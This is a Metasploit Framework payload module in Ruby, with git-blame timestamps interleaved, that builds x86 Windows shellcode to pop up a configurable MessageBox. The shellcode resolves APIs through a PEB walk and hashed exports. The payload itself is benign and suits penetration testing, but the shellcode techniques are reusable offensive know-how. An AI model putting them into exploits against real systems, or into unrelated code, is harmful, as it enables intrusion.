2010-09-27 13:31:48 +00:00
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##
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2011-07-29 02:31:18 +00:00
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# $Id$
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2010-09-27 13:31:48 +00:00
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##
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##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# Framework web site for more information on licensing and terms of use.
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# http://metasploit.com/framework/
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##
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require 'msf/core'
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module Metasploit3
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include Msf::Payload::Windows
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include Msf::Payload::Single
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def initialize(info = {})
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super(merge_info(info,
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'Name' => 'Windows MessageBox',
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'Description' => 'Spawns a dialog via MessageBox using a customizable title, text & icon',
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'Author' =>
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[
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2012-01-09 20:23:37 +00:00
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'corelanc0d3r <peter.ve[at]corelan.be>', # original payload module
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2010-09-27 13:31:48 +00:00
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'jduck' # some ruby factoring
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],
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'License' => MSF_LICENSE,
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2011-07-29 02:28:46 +00:00
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'Version' => "$Revision$",
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2010-09-27 13:31:48 +00:00
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'Platform' => 'win',
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'Arch' => ARCH_X86
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))
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# Register MessageBox options
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register_options(
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[
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OptString.new('TITLE', [ true, "Messagebox Title (max 255 chars)", "MessageBox" ]),
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OptString.new('TEXT', [ true, "Messagebox Text (max 255 chars)", "Hello, from MSF!" ]),
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OptString.new('ICON', [ true, "Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION", "NO" ])
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], self.class)
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end
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#
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# Construct the payload
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#
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def generate
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strTitle = datastore['TITLE'] + "X"
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if (strTitle.length < 1)
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raise ArgumentError, "You must specify a title"
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end
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if (strTitle.length >= 256)
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raise ArgumentError, "The title must be less than 256 characters long."
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end
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strText = datastore['TEXT'] + "X"
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if (strText.length < 1)
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raise ArgumentError, "You must specify the text of the MessageBox"
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end
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if (strText.length >= 256)
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raise ArgumentError, "The text must be less than 256 characters long."
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end
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# exitfunc process or thread ?
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stackspace = "0x04"
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funchash = ""
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doexitseh = ""
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case datastore['EXITFUNC'].upcase.strip
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when 'PROCESS'
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stackspace = "0x08"
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funchash = "0x73E2D87E"
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when 'THREAD'
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stackspace = "0x08"
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funchash = "0x60E0CEEF"
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end
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# create exit routine for process / thread
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getexitfunc = <<EOS
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;base address of kernel32 will be at esp,
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mov ebx,#{funchash}
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xchg ebx, dword [esp]
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push edx
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call find_function
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;store function address at ebx+08
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mov [ebp+0x8],eax
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EOS
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2011-03-08 22:48:39 +00:00
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2010-09-27 13:31:48 +00:00
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doexit = <<EOS
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xor eax,eax ;zero out eax
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push eax ;put 0 on stack
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call [ebp+8] ;ExitProcess/Thread(0)
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EOS
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# if exit is set to seh, overrule
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if datastore['EXITFUNC'].upcase.strip == "SEH"
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# routine to exit via exception
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doexit = <<EOS
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xor eax,eax
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call eax
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EOS
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getexitfunc = ''
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end
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# Generate code to get ptr to Title
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marker_idx = strTitle.length - 1
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strPushTitle = string_to_pushes(strTitle, marker_idx)
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# generate code to write null byte
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strWriteTitleNull = "xor ebx,ebx\n\tmov [esp+0x#{marker_idx.to_s(16)}],bl\n\tmov ebx,esp\n\t"
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#================Process Text===============================
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marker_idx = strText.length - 1
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strPushText = string_to_pushes(strText, marker_idx)
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strWriteTextNull = "xor ecx,ecx\n\tmov [esp+0x#{marker_idx.to_s(16)}],cl\n\tmov ecx,esp\n\t"
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# generate code to set messagebox icon
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setstyle = "push edx\n\t"
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case datastore['ICON'].upcase.strip
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#default = NO
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when 'ERROR'
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setstyle = "push 0x10\n\t"
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when 'QUESTION'
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setstyle = "push 0x20\n\t"
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when 'WARNING'
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setstyle = "push 0x30\n\t"
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when 'INFORMATION'
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setstyle = "push 0x40\n\t"
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end
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#create actual payload
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payload_data = <<EOS
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;getpc routine
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fldpi
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fstenv [esp-0xc]
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xor edx,edx
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mov dl,0x77 ;offset to start_main
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;get kernel32
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xor ecx,ecx
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mov esi, [fs:ecx + 0x30]
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mov esi, [esi + 0x0C]
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mov esi, [esi + 0x1C]
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next_module:
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mov eax, [esi + 0x08]
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mov edi, [esi + 0x20]
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mov esi, [esi]
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cmp [edi + 12*2], cl
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jne next_module
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pop ecx
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add ecx,edx
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jmp ecx ;jmp start_main
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find_function:
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pushad ;save all registers
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mov ebp, [esp + 0x24] ;put base address of module that is being loaded in ebp
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mov eax, [ebp + 0x3c] ;skip over MSDOS header
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mov edx, [ebp + eax + 0x78] ;go to export table and put relative address in edx
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add edx, ebp ;add base address to it.
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;edx = absolute address of export table
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mov ecx, [edx + 0x18] ;set up counter ECX
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;(how many exported items are in array ?)
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mov ebx, [edx + 0x20] ;put names table relative offset in ebx
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add ebx, ebp ;add base address to it.
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;ebx = absolute address of names table
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find_function_loop:
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jecxz find_function_finished ;if ecx=0, then last symbol has been checked.
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;(should never happen)
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;unless function could not be found
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dec ecx ;ecx=ecx-1
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mov esi, [ebx + ecx * 4] ;get relative offset of the name associated
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;with the current symbol
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;and store offset in esi
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add esi, ebp ;add base address.
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;esi = absolute address of current symbol
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compute_hash:
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xor edi, edi ;zero out edi
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xor eax, eax ;zero out eax
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cld ;clear direction flag.
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;will make sure that it increments instead of
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;decrements when using lods*
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compute_hash_again:
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lodsb ;load bytes at esi (current symbol name)
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;into al, + increment esi
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test al, al ;bitwise test :
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;see if end of string has been reached
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jz compute_hash_finished ;if zero flag is set = end of string reached
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ror edi, 0xd ;if zero flag is not set, rotate current
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;value of hash 13 bits to the right
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add edi, eax ;add current character of symbol name
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;to hash accumulator
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jmp compute_hash_again ;continue loop
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compute_hash_finished:
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find_function_compare:
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cmp edi, [esp + 0x28] ;see if computed hash matches requested hash
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; (at esp+0x28)
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;edi = current computed hash
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;esi = current function name (string)
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jnz find_function_loop ;no match, go to next symbol
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mov ebx, [edx + 0x24] ;if match : extract ordinals table
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;relative offset and put in ebx
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add ebx, ebp ;add base address.
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;ebx = absolute address of ordinals address table
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mov cx, [ebx + 2 * ecx] ;get current symbol ordinal number (2 bytes)
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mov ebx, [edx + 0x1c] ;get address table relative and put in ebx
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add ebx, ebp ;add base address.
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;ebx = absolute address of address table
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mov eax, [ebx + 4 * ecx] ;get relative function offset from its ordinal
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;and put in eax
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add eax, ebp ;add base address.
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;eax = absolute address of function address
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mov [esp + 0x1c], eax ;overwrite stack copy of eax so popad
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;will return function address in eax
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find_function_finished:
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popad ;restore original registers.
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;eax will contain function address
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ret
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start_main:
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mov dl,#{stackspace}
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sub esp,edx ;allocate space on stack
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mov ebp,esp ;set ebp as frame ptr for relative offset
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mov edx,eax ;save base address of kernel32 in edx
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push 0xEC0E4E8E ;get LoadLibrary function ptr
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push edx
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call find_function
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;put function address on stack (ebx+04)
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mov [ebp+0x4],eax
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#{getexitfunc} ;optionally get selected exit function ptr
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;put pointer to string user32.dll to stack
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push 0x41206c6c
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push 0x642e3233
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push 0x72657375 ;user32.dll
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mov [esp+0xA],bl ;null byte
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mov esi,esp ;put pointer to string on top of stack
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push esi
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call [ebp+0x4] ;call LoadLibrary
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; base address of user32.dll is now in eax (if loaded correctly)
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mov edx,eax ;put ptr in edx
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push eax ;put it on stack as well
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;find the MessageBoxA function
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mov ebx, 0xBC4DA2A8
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xchg ebx, dword [esp] ;esp = base address of user32.dll
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push edx
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call find_function
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;function address should be in eax now
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;we'll keep it there
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;get pointer to title
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#{strPushTitle}
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#{strWriteTitleNull} ;ebx will point to title
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;get pointer to text
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#{strPushText}
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#{strWriteTextNull} ;ecx will point to text
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;now push parameters to the stack
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xor edx,edx ;zero out edx
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#{setstyle} ;set button/iconstyle on stack
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push ebx ;put pointer to Title on stack
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push ecx ;put pointer to Text on stack
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push edx ;put 0 on stack (hWnd)
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call eax ;call MessageBoxA(hWnd,Text,Title,Style)
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;ExitFunc
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#{doexit}
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EOS
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the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
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end
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#
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# Turn the provided string into a serious of pushes
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#
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def string_to_pushes(str, marker_idx)
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# Align string to 4 bytes
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rem = (marker_idx+1) % 4
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if (rem > 0)
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str << " " * (4 - rem)
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end
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# string is now 4 byte aligned and ends with 'X' at index 'marker_idx'
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# push string to stack, starting at the back
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pushes = ''
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while (str.length > 0)
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four = str.slice!(-4, 4)
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dw = four.unpack('V').first
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pushes << "push 0x%x\n\t" % dw
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end
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pushes
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end
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end
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